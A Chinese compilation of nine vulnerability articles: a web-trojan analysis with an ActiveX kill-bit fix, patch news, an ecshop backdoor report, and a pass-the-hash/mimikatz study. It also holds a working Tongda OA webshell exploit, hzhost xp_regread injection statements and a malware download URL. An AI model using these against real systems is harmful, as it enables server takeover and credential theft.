无补丁？教你阻击Office漏洞漏洞预警

下面是小编整理的无补丁？教你阻击Office漏洞漏洞预警，本文共9篇，希望对大家有所帮助。本文原稿由网友“狼苦”提供。

篇1：无补丁？教你阻击Office漏洞漏洞预警

朋友在一个3D培训电脑培训公司当网管实习，临时回家了几天，找到我代替他工作几天，这家公司属于中型规模，通过路由器组建的局域网，大概有200多台电脑，10M光纤接入，但是网速出奇的慢，每台电脑里都装了个杀毒软件加上一个ARP防火墙，ARP防火墙经常弹出提示192.168.1.102发来攻击，很明显这台电脑中招了，攻击全局域网导致上网速度十分的慢。每台机器也没什么重要的东西，主要上面就是运行一些3D软件。锁定了这台电脑IP后，找到了这台电脑，临时叫使用这个电脑的人换到了我电脑上。

打开IE发现主页被篡改，经常弹出未知网页，杀毒软件和防火墙也打不开，打开某些程序提示软件出错(像是已经被感染)，看来中了很BT的病毒，如果手工杀起毒来，恐怕需要一些时候了。一般情况下，这里的机器中了毒基本都是用GHOST重新装的，看来这台机器也是要这样了，节省时间，反正里面也没什么重要数据。但是重装之前得分析清楚，是什么原因让这个机器中毒了，由于这里的人平时也不下载什么软件，由于软件被木马捆绑中毒的概率很低，多半是浏览哪个网页导致的。

先断开本地连接，在一个弹出网页中找到了如下代码：图1

图1

一看就是挂马了，把这个网页通过另一台机器用迅雷把这张网页下载下来，看到一堆的代码：

图2

是自定义函数加密的网页木马，加密代码的最上面有一个eval函数，把eval改成document.write保存后直接打开这个页面，得到第一次解密。如下：图3

图3

1复制出以上解密的代码，再建立第二张网页，把document.write(t)换成document.getElementById('textfield').value=t;，在网页的最下面写上

2

3

4

5

注意textfield与document.getElementById('textfield').value=t;里的textfield是相对应的。之后打开这个网页，得到了最终解密的结果。图4

贴出完整的代码如下：

1

其中http换成了hxxp防止误入。

很明显，这个是Microsoft Office Snapshot Viewer ActiveX 漏洞利用代码，是Office系列软件中Access的漏洞，受这个漏洞影响的Access版本有、、，如果仅仅安装了Microsoft Snapshot Viewer 10.0.4622程序，也具有该漏洞。也难怪这个漏洞会使打全补丁的系统中招，目前官方没有给出补丁，其实世界上根本没有打全了补丁的系统。

我们看到代码中有这样的代码：

1mycars[0] = “c:/Program Files/Outlook Express/wab.exe”;

2mycars[1] = “d:/Program Files/Outlook Express/wab.exe”;

3mycars[2] = “e:/Program Files/Outlook Express/wab.exe”;

4mycars[3] = “C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe”;

5mycars[4] = “C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe”;

可以看出，漏洞利用者想尽了利用的方式，mycars[0] = “c:/Program Files/Outlook Express/wab.exe”;mycars[1] = “d:/Program Files/Outlook Express/wab.exe”;mycars[2] = “e:/Program Files/Outlook Express/wab.exe”;这个是能够触发直接运行恶意程序的利用方式，而后两句，一个是写入启动项，一个是写入迅雷开机自启动里面，

甚至说即使不直接触发漏洞运行，写在启动里面，开机后恶意程序也会悄悄的运行。而代码里这句hxxp://jijiks8ahsda.cn/9/ck.exe就是运程下载恶意程序的地址了。

目前这个漏洞利用代码已经在网上传开了，而杀毒软件自带的漏洞更新程序并未见到这个官方给出的这个漏洞的补丁。

笔者GHOST完系统后，系统中自带了OFFICE2003，把这个hxxp://jijiks8ahsda.cn/9/ck.ex换成了一个自写的VB小程序亲自在本地测试了一下这个漏洞，运行该网页后弹出了程序窗口，并且在启动项里找到VB小程序。该漏洞对于未做安全防护的用户中马的概率十分的高，最后做了下全局域网的安全防护。

首先设置一下IE的安全级别，所有机器上INTERNET安全级别设置了为“高”，之后在受限站点里面加入该站点，加入该恶意站点。然后通过禁用COM组件安装包，来禁止该漏洞触发，这只能是临时解决方案。将以下代码复制到记事本。

1Windows Registry Editor Version 5.00

2[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{F0E42D50-

3368C-11D0-AD81-00A0C90DC8D9}]

4“Compatibility Flags”=dword:00000400

5[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{F0E42D60-

6368C-11D0-AD81-00A0C90DC8D9}]

7“Compatibility Flags”=dword:00000400

8[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{F2175210-

9368C-11D0-AD81-00A0C90DC8D9}]

10“Compatibility Flags”=dword:00000400

把其另存为safe.reg，在全局域网所有机器上执行，导入注册表，这样就手工禁用了COM组件安装包。最后开启所有机器上的杀毒软件的网页木马拦截功能，等待官方的补丁出来后，迅速打上该补丁。

篇2：补丁刚打完Office再现高危漏洞

微软今天刚发布9个重要安全漏洞补丁，可惜补的总是没有找的快，著名安全网络公司Secunia再次发出警报，Office又现高危易受攻击性漏洞，可导致整个计算机系统被 侵入控制，

补丁刚打完Office再现高危漏洞

，

此漏洞由HexViewSecurityResearc

篇3：微软发布“拒绝服务漏洞”修复补丁漏洞预警

在修补了59个IE漏洞之后，微软终于为其安全软件堵上了一个安全漏洞，据悉，该漏洞可在使用“恶意软件防护引擎”(Malware Protection Engine)进行扫描时触发。然后，攻击者可利用其发动拒绝服务(DoS)攻击，除非文件被删除并重启。

微软将该补丁设定成了“重要”级别。

尽管攻击者要实现一次成功的攻击，需要来自用户的一些交互(如下载一个附件并打开)，可鉴于大多数用户的技能水平和安全意识，未打补丁的系统仍将面临极大的风险。

受该漏洞影响的软件包括Microsoft Forefront Client Security、Microsoft Forefront Endpoint Protection 、Microsoft Forefront Security for SharePoint Service Pack 3、Microsoft System Center Endpoint Protection、Microsoft Malicious Software Removal Tool，以及Windows Intune Endpoint Protection、Microsoft Security Essentials和Windows Defender（最后一个可是随着最新的微软OS一起预装的，影响面也是最广的），

虽然微软会通过“自动更新”来升级上述软件的定义库和引擎，但用户最好还是看下自己的“恶意软件防护引擎”的版本是否已经升级到了1.1.10701.0及以上。

篇4：MS.NET Framework 存在漏洞 尚无补丁漏洞预警

Microsoft .NET Framework是一个流行的软件开发工具包，

.NET Framework在处理内嵌请求时存在漏洞，攻击者可能利用此漏洞注入脚本代码执行。

.NET Framework没有正确的过滤内嵌的.NET请求，允许攻击者执行跨站脚本攻击，

如果Web应用在向浏览器回显输入前仅仅依赖于.NET请求过滤的话，攻击者就可能通过特制的请求注入脚本代码。

受影响系统：Microsoft .NET Framework 2.0

厂商补丁：目前微软还没有提供补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：www.microsoft.com/technet/security/

篇5：ecshop 7号补丁再次出现隐蔽后门漏洞预警

ecshop被收购后，就不知道是怎么了

5月7号更新的7号补丁，但是下载下来后，我发现明显不对，

第一，includes目录里面多了个install文件夹，原来是没有这个文件夹的，并且里面全是js（最后发现这个目录根本没用到，骇客大哥你做事情能仔细点不）

第二，admin/js目录里面全部js都上来了（后面通过文件比较发现只有一个文件有修改）

好了，我们要分析下这位骇客大哥干的“好事”。

首先，他修改了includes\\lib_base.php文件的write_static_cache函数

把原来的：

修改成了：

很明显这个为了写文件，这位大哥的毛病又犯了，不知道大哥用的什么编辑器，修改后文件编码从utf-8变成了utf-8+

造成的后果是如果打了这个补丁的网站会出现：

代码调用的地方在：

文件位置：includes\\fckeditor\\editor\\dialog\\fck_spellerpages\\spellerpages\\server-scripts\\spellchecker.php(这个文件够深)

这个样子后，你就可以随便弄个表单提交到spellchecker.php，提交一个文件名和内容就可以了，

可以生成任何内容的文件。

大牛还整了个统计的，真是有心拉，在文件admin\\js\\common.js

把中招的网址发到 bbs.ecshop.com/forumdata/logs/install.php还故意用的bbs.ecshop.com来躲避嫌疑

这个补丁的问题我当天就发现了，但是最近一直比较忙没有公布出来，心想ecshop应该会发现吧，但是半个月过去了都没反应，我就抽空写了出来，

我想说的是ecshop肿么了!

​

篇6：教你如何取得hzhost安装绝对路径漏洞预警

有一些朋友在看了我的hzhost入侵系列文章后,也遇到过目录不在D盘的困难.

我在<再爆hzhost虚拟主机sql注射漏洞>中提到过,可以把注册表中的存放绝对路径值更新到用户某个字段中,再去读.当然只是个人思路.没有给出具体的操作方法.

我经过一些测试.在本地模拟测试中,终于弄好了.现在放出来.

引用:

DROP TABLE [xxbing] //如果存在这个表,先把他删掉.

引用:

create table [dbo].[xxbing] ([xxni][varchar](4000)) //新建xxbing表,插如xxni字段

引用:

DECLARE @result varchar(4000) exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\\hzhost\\config\\settings','agentroot',@result output insert into xxbing (xxni) values(@result);-- //把从注册表中读的值得放到xxni中.

引用:

update memlst set u_eml=(select xxni from xxbing) where u_nme='用户名'//更新你注册的用户的e-mail为hzhost的安装绝对路径.

还可以读3389端口.==,只要注册表中存在的值.

不过也会有失败的时候,比如数据库连接用户权限太小,xp_regread被删了,或者读的字符串太长.

(u_eml只有50,读太长的数据会失败)

注明:我只在本机mssql,查询分析器中测试了一遍,并没有实际去在网站上操作.我测试时使用的权限是DBO.

篇7：通达OA 通杀GETSHELL修复补丁漏洞预警

此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很 , 所以注入方面就不考虑了.

EXP：

第一步: [GET]site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}

第二步: [GET]site/general/email/index.php

SHELL: site/general/email/shell.php 密码C

此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好

有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~

​

篇8：5月微软补丁KB287和KB2928120漏洞利用分析漏洞预警

5月，微软在13日发布月度安全更新，其中 有KB2871997和 KB2928120 两个知识库文章Knowledgeased（而KB2871997甚至不是Security Bulletin），对于无论是作为攻击的渗透测试人员还是作为防守的管理员都不容忽视这两个更新。 KB2871997针对大名鼎鼎的PTH（pass the hash攻击方式）。下面看看安全研究人员Craig对此分析。

KB2871997

这个被称为“PTH杀手”的更新，将使本地帐号不再可以用于远程接入系统，不管是 network logon 还是 interactive login，这就包括像使用 PSEXEC工具甚至IPC远程浏览 C$ ，从表面上看这就有效的降低了一些攻击场景下的威胁。例如一台机器被攻陷后，dump出所有hash，找到本地管理员的hash，再拿着去攻击网络内其他使用相同密码的机器，往往整个网络就这样被控制下来了。

然而，在 Craig 的测试中发现，所有以上的情况都是没说错，但是唯独默认的 Administrator (SID 500)帐号例外，请注意把administrator改名了，它的SID仍然是500，只要它还是 SID 500那么以前的攻击方法还是有效。

所以作为防守方的管理员应该要禁用默认的 local admin帐号，然后重新新建常规的 local user帐号，再把它加进去管理员组。如果管理员做到这样了，那么 dump到的本地hash将不再在网络重放中有效，不管是hash还是实际的 credentials。Windows 7默认是禁用 Administrator帐号的，但是 Craig 发现往往在有些企业环境里，这个 Administrator帐号又会被启用起来，只是改了个名字， 也就是说仍然是SID 500，那么这个补丁将帮不了你。

Craig在MSF和powershell里用WMI和psexec_command测试过，都有同样的结果——所有 local account访问都被deny了，除了 SID 500。 Domain hashes和SID 500 的hash仍然可以 pass the hash。

在下图可以看到仍然可以在测试的域环境里一个成员中执行PSEXEC，使用的就是一个SID还是500的帐号，虽然它已经名为renamedAdmin，

如下图所示针对 renamedAdmin， pass the hash攻击仍然有效，但是rdptest就不行了。

下图你可以看到rdptest在本地管理员组，但是已经不是SID 500了。

=

mimikatz

提到 KB2871997不得不说的还有 mimikatz，它通常已经攻陷了管理员用RDP连接过系统后，就可以用 mimikatz拿到管理员的明文密码了，

在 KB2871997补丁以前，即便管理员是正确的退出RDP连接，而不只是关掉连接窗口，仍然可以随时使用mimikatz拿到明文密码。 KB2871997补丁以后，只要你是正常的log off你的RDP连接，那么就会清除内存中的 credentials，但是如果比只是关掉连接的窗口，那么mimikatz的攻击仍然是有效的。 Craig的测试发现，系统并不会立即清除内存中的 credentials，但是大约30秒左右credentials就没有了。

针对Craig的这个说法，小编发现在Craig测试几天后， mimikatz就发布了一个更新的版本mimikatz 2.0 alphagithub.com/gentilkiwi/mimikatz/releases/ ，并且更新里说明可以应对 KB2871997。“Pass-The-eKeys now also working on Windows 7/8 if KB2871997 installed”是不是生活顿时又充满了希望呢！

KB2928120

再说说GPP，来自官方说法是”某些组策略首选项可以存储密码。此功能将被删除，因为通过这种方式存储的密码不安全“。

以下组策略首选项将不再允许保存用户名和密码：

1，驱动器映射2，本地用户和组3，计划任务4，服务5，数据源

这将影响环境中依赖于这些首选项中包含的密码的任何现有组策略对象 (GPO) 的行为。此外，它还会阻止通过使用此功能创建新的组策略首选项。

对于“驱动器映射”、“本地用户和组”和“服务”，您也许能够通过 Windows 中其他更加安全的功能实现相似的目标。

对于“计划任务”和“数据源”，您将无法达到通过不安全的组策略首选项密码功能所能实现的目标。

Craig测试发现如果打完这个补丁后，再去之前创建的 admin account，双击他就会出行一个警告消息

点继续就会看到密码仍然在那里，但是已经不能被修改了。密码部分已经灰了。

当再新建帐号时，已经不能再设置密码了。

参考文献：

www.pwnag3.com//05/what-did-microsoft-just-break-with.html

​

篇9：微软发布office漏洞警告 建议用户安装补丁Windows漏洞

北京时间3月15日消息，据国外媒体报道，微软周二表示，office办公软件中存在着一个安全漏洞， 们可借此控制用户计算机，用户应立即下载并安装相应补丁程序，

微软将该漏洞的安全级别定为“危急”，该公司周二发布的每月安全升级公告中已包含了该漏洞的补丁。该公司还发布了一个针对windows操作系统的安全警告，安全级别为“重要”，外部人员可借此获得用户重要数据的访问权。微软还表示，在用户不进行任何操作前提下，另一个漏洞将允许网络病毒实施复制，其安全级别为“危急”，

随着针对微软windows操作系统及其他软件的恶意程序的增多，过去数年中，该公司一直在加强产品的安全性和稳定性。上述最新安全补丁可从www.microsoft.com/security处下载。

关 键 字：Windows漏洞

ServU多个安全漏洞漏洞预警

网站常见漏洞 文件上传漏洞漏洞预警

PHP字符编码绕过漏洞总结漏洞预警

WebPageTest任意php文件上传漏洞预警

企业SEO专业网站漏洞及修复漏洞预警

无补丁？教你阻击Office漏洞漏洞预警.doc

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档